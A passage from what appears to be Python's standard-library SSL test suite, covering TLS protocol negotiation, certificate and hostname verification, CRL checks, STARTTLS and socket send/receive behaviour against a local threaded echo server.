Also, if *expect_success* is a string, assert that it is the protocol
version actually used by the connection.
"""
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
client_context = ssl.SSLContext(client_protocol)
client_context.options |= client_options
server_context = ssl.SSLContext(server_protocol)
server_context.options |= server_options
# NOTE: we must enable "ALL" ciphers on the client, otherwise an
# SSLv23 client will send an SSLv3 hello (rather than SSLv2)
# starting from OpenSSL 1.0.0 (see issue #8322).
if client_context.protocol == ssl.PROTOCOL_TLS:
client_context.set_ciphers("ALL")
for ctx in (client_context, server_context):
ctx.verify_mode = certsreqs
ctx.load_cert_chain(SIGNED_CERTFILE)
ctx.load_verify_locations(SIGNING_CA)
try:
stats = server_params_test(client_context, server_context,
chatty=False, connectionchatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except OSError as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
elif (expect_success is not True
and expect_success != stats['version']):
raise AssertionError("version mismatch: expected %r, got %r"
% (expect_success, stats['version']))
class ThreadedTests(unittest.TestCase):
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if support.verbose:
sys.stdout.write("\n")
for protocol in PROTOCOLS:
if protocol in {ssl.PROTOCOL_TLS_CLIENT, ssl.PROTOCOL_TLS_SERVER}:
continue
with self.subTest(protocol=ssl._PROTOCOL_NAMES[protocol]):
context = ssl.SSLContext(protocol)
context.load_cert_chain(CERTFILE)
server_params_test(context, context,
chatty=True, connectionchatty=True)
client_context, server_context, hostname = testing_context()
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_SERVER):
server_params_test(client_context=client_context,
server_context=server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
client_context.check_hostname = False
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIn('called a function you should not call',
str(e.exception))
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_SERVER):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=server_context,
chatty=True, connectionchatty=True)
self.assertIn('called a function you should not call',
str(e.exception))
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True)
self.assertIn('called a function you should not call',
str(e.exception))
def test_getpeercert(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
do_handshake_on_connect=False,
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# getpeercert() raise ValueError while the handshake isn't
# done.
with self.assertRaises(ValueError):
s.getpeercert()
s.do_handshake()
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
self.assertIn('notBefore', cert)
self.assertIn('notAfter', cert)
before = ssl.cert_time_to_seconds(cert['notBefore'])
after = ssl.cert_time_to_seconds(cert['notAfter'])
self.assertLess(before, after)
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_crl_check(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(client_context.verify_flags, ssl.VERIFY_DEFAULT | tf)
# VERIFY_DEFAULT should pass
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
client_context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaisesRegex(ssl.SSLError,
"certificate verify failed"):
s.connect((HOST, server.port))
# now load a CRL file. The CRL file is signed by the CA.
client_context.load_verify_locations(CRLFILE)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
def test_check_hostname(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname="invalid") as s:
with self.assertRaisesRegex(
ssl.CertificateError,
"Hostname mismatch, certificate is not valid for 'invalid'."):
s.connect((HOST, server.port))
# missing server_hostname arg should cause an exception, too
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with socket.socket() as s:
with self.assertRaisesRegex(ValueError,
"check_hostname requires server_hostname"):
client_context.wrap_socket(s)
def test_ecc_cert(self):
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
client_context.set_ciphers('ECDHE:ECDSA:!NULL:!aRSA')
hostname = SIGNED_CERTFILE_ECC_HOSTNAME
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# load ECC cert
server_context.load_cert_chain(SIGNED_CERTFILE_ECC)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()[0].split('-')
self.assertTrue(cipher[:2], ('ECDHE', 'ECDSA'))
def test_dual_rsa_ecc(self):
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
# TODO: fix TLSv1.3 once SSLContext can restrict signature
# algorithms.
client_context.options |= ssl.OP_NO_TLSv1_3
# only ECDSA certs
client_context.set_ciphers('ECDHE:ECDSA:!NULL:!aRSA')
hostname = SIGNED_CERTFILE_ECC_HOSTNAME
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# load ECC and RSA key/cert pairs
server_context.load_cert_chain(SIGNED_CERTFILE_ECC)
server_context.load_cert_chain(SIGNED_CERTFILE)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()[0].split('-')
self.assertTrue(cipher[:2], ('ECDHE', 'ECDSA'))
def test_check_hostname_idn(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(IDNSANSFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_verify_locations(SIGNING_CA)
# correct hostname should verify, when specified in several
# different ways
idn_hostnames = [
('könig.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
('xn--knig-5qa.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
(b'xn--knig-5qa.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
('königsgäßchen.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
('xn--knigsgsschen-lcb0w.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
(b'xn--knigsgsschen-lcb0w.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
# ('königsgäßchen.idna2008.pythontest.net',
# 'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
('xn--knigsgchen-b4a3dun.idna2008.pythontest.net',
'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
(b'xn--knigsgchen-b4a3dun.idna2008.pythontest.net',
'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
]
for server_hostname, expected_hostname in idn_hostnames:
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname=server_hostname) as s:
self.assertEqual(s.server_hostname, expected_hostname)
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertEqual(s.server_hostname, expected_hostname)
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="python.example.org") as s:
with self.assertRaises(ssl.CertificateError):
s.connect((HOST, server.port))
def test_wrong_cert_tls12(self):
"""Connecting when the server rejects the client's certificate
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with a wrong client certificate fails.
"""
client_context, server_context, hostname = testing_context()
# load client cert
client_context.load_cert_chain(WRONG_CERT)
# require TLS client authentication
server_context.verify_mode = ssl.CERT_REQUIRED
# TLS 1.3 has different handshake
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
server = ThreadedEchoServer(
context=server_context, chatty=True, connectionchatty=True,
)
with server, \
client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
try:
# Expect either an SSL error about the server rejecting
# the connection, or a low-level connection reset (which
# sometimes happens on Windows)
s.connect((HOST, server.port))
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
@unittest.skipUnless(ssl.HAS_TLSv1_3, "Test needs TLS 1.3")
def test_wrong_cert_tls13(self):
client_context, server_context, hostname = testing_context()
client_context.load_cert_chain(WRONG_CERT)
server_context.verify_mode = ssl.CERT_REQUIRED
server_context.minimum_version = ssl.TLSVersion.TLSv1_3
client_context.minimum_version = ssl.TLSVersion.TLSv1_3
server = ThreadedEchoServer(
context=server_context, chatty=True, connectionchatty=True,
)
with server, \
client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# TLS 1.3 perform client cert exchange after handshake
s.connect((HOST, server.port))
try:
s.write(b'data')
s.read(4)
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an OSError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = support.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen()
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
with socket.socket() as c:
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = test_wrap_socket(c)
except OSError:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
def test_ssl_cert_verify_error(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
try:
s.connect((HOST, server.port))
except ssl.SSLError as e:
msg = 'unable to get local issuer certificate'
self.assertIsInstance(e, ssl.SSLCertVerificationError)
self.assertEqual(e.verify_code, 20)
self.assertEqual(e.verify_message, msg)
self.assertIn(msg, repr(e))
self.assertIn('certificate verify failed', repr(e))
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv2'),
"OpenSSL is compiled without SSLv2 support")
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
# SSLv23 client with specific SSL options
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv2)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
def test_PROTOCOL_TLS(self):
"""Connecting to an SSLv23 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try:
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv2, True)
except OSError as x:
# this fails on some older versions of OpenSSL (0.9.7l, for instance)
if support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1')
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
# Server with specific SSL options
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False,
server_options=ssl.OP_NO_SSLv3)
# Will choose TLSv1
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, False,
server_options=ssl.OP_NO_TLSv1)
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv3'),
"OpenSSL is compiled without SSLv3 support")
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3')
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLS,
False, client_options=ssl.OP_NO_SSLv2)
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1')
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_1"),
"TLS version 1.1 not supported.")
def test_protocol_tlsv1_1(self):
"""Connecting to a TLSv1.1 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1_1)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_1, False)
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_2"),
"TLS version 1.2 not supported.")
def test_protocol_tlsv1_2(self):
"""Connecting to a TLSv1.2 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2',
server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1_2)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2')
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
starttls_server=True,
chatty=True,
connectionchatty=True)
wrapped = False
with server:
s = socket.socket()
s.setblocking(1)
s.connect((HOST, server.port))
if support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
if indata == b"STARTTLS" and msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
if support.verbose:
sys.stdout.write(
" client: read %r from server, starting TLS...\n"
% msg)
conn = test_wrap_socket(s)
wrapped = True
elif indata == b"ENDTLS" and msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
if support.verbose:
sys.stdout.write(
" client: read %r from server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = False
else:
if support.verbose:
sys.stdout.write(
" client: read %r from server\n" % msg)
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write(b"over\n")
else:
s.send(b"over\n")
if wrapped:
conn.close()
else:
s.close()
def test_socketserver(self):
"""Using socketserver to create and manage SSL connections."""
server = make_https_server(self, certfile=SIGNED_CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
d2 = ''
# now fetch the same data from the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
context = ssl.create_default_context(cafile=SIGNING_CA)
f = urllib.request.urlopen(url, context=context)
try:
dlen = f.info().get("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
with server:
s = test_wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
def test_recv_send(self):
"""Test recv(), send() and friends."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_CLIENT)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, expect success?, *args, return value func)
send_methods = [
('send', s.send, True, [], len),
('sendto', s.sendto, False, ["some.address"], len),
('sendall', s.sendall, True, [], lambda x: None),
]
# (name, method, whether to expect success, *args)
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
data_prefix = "PREFIX_"
for (meth_name, send_meth, expect_success, args,
ret_val_meth) in send_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
ret = send_meth(indata, *args)
msg = "sending with {}".format(meth_name)
self.assertEqual(ret, ret_val_meth(indata), msg=msg)
outdata = s.read()
if outdata != indata.lower():
self.fail(
"While sending with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
s.send(indata)
outdata = recv_meth(*args)
if outdata != indata.lower():
self.fail(
"While receiving with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
# consume data
s.read()
# read(-1, buffer) is supported, even though read(-1) is not
data = b"data"
s.send(data)
buffer = bytearray(len(data))
self.assertEqual(s.read(-1, buffer), len(data))
self.assertEqual(buffer, data)
# sendall accepts bytes-like objects
if ctypes is not None:
ubyte = ctypes.c_ubyte * len(data)
byteslike = ubyte.from_buffer_copy(data)
s.sendall(byteslike)
self.assertEqual(s.read(), data)
# Make sure sendmsg et al are disallowed to avoid
# inadvertent disclosure of data and/or corruption
# of the encrypted data stream
self.assertRaises(NotImplementedError, s.sendmsg, [b"data"])
self.assertRaises(NotImplementedError, s.recvmsg, 100)
self.assertRaises(NotImplementedError,
s.recvmsg_into, bytearray(100))
s.write(b"over\n")
self.assertRaises(ValueError, s.recv, -1)
self.assertRaises(ValueError, s.read, -1)
s.close()
def test_recv_zero(self):
server = ThreadedEchoServer(CERTFILE)
server.__enter__()
self.addCleanup(server.__exit__, None, None)
s = socket.create_connection((HOST, server.port))
self.addCleanup(s.close)
s = test_wrap_socket(s, suppress_ragged_eofs=False)
self.addCleanup(s.close)
# recv/read(0) should return no data
s.send(b"data")
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.read(0), b"")
self.assertEqual(s.read(), b"data")
# Should not block if the other end sends no data
s.setblocking(False)
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.recv_into(bytearray()), 0)
def test_nonblocking_send(self):
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_CLIENT)
s.connect((HOST, server.port))
s.setblocking(False)
# If we keep sending data, at some point the buffers
# will be full and the call will block
buf = bytearray(8192)
def fill_buffer():
while True:
s.send(buf)
self.assertRaises((ssl.SSLWantWriteError,
ssl.SSLWantReadError), fill_buffer)
# Now read all the output and discard it
s.setblocking(True)
s.close()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen()
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
for sock in conns:
sock.close()
t = threading.Thread(target=serve)
